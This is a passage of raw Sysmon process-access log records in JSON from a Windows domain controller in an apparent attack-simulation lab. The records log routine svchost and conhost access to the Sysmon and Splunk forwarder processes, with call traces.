C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:00.031","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:00.031\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01D3-5F25-0000-0010E0390400}\r\nTargetProcessId: 3316\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 